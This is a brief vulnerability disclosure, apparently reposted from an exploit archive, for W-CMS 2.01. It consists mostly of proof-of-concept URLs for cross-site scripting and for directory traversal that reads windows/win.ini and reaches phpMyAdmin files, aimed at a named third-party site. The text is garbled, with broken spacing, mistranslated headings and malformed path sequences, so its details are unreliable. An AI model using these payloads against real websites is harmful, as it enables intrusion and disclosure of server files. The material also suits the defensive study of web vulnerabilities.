Title: W-Cms Multiple Vulnerability
Author: th3.g 4m3 _ 0v3r
Develop this Website: http://w-cms.info/
: Http://code.google.com/p/wcms/
Affected Versions: [2.01]
Test Platform: Window 7
W-CMS cross site scripting
_______________
Defect connection __________\/_____________________
_______________
A http://www.bkjia.com/index. php? Bid = 1 & COMMENT = 1 "XSS"
Http://www.bkjia.com /? P = 3 "XSS"
Http://www.bkjia.com /? Bid = 5 & p = 1 "XSS"
Http://www.bkjia.com /? P = 3 <FORM action = "Default. asp? PageId =-1"
Method = POST id = searchFORMname = searchFORM
Style = "margin: 0; padding: 0"> <INPUT type = "hidden" value = ""
Name = "txtSEARCH"> </FORM>
++ ++
Directory traversal attacks
This script is possibly vulnerable to directory traversal attacks
Http://www.bkjia.com/wcms-2.01_2 /? P =.../../windows/win. ini
Http://www.bkjia.com/wcms-2.01_2 /? P =.../phpMyAdmin/db_create.php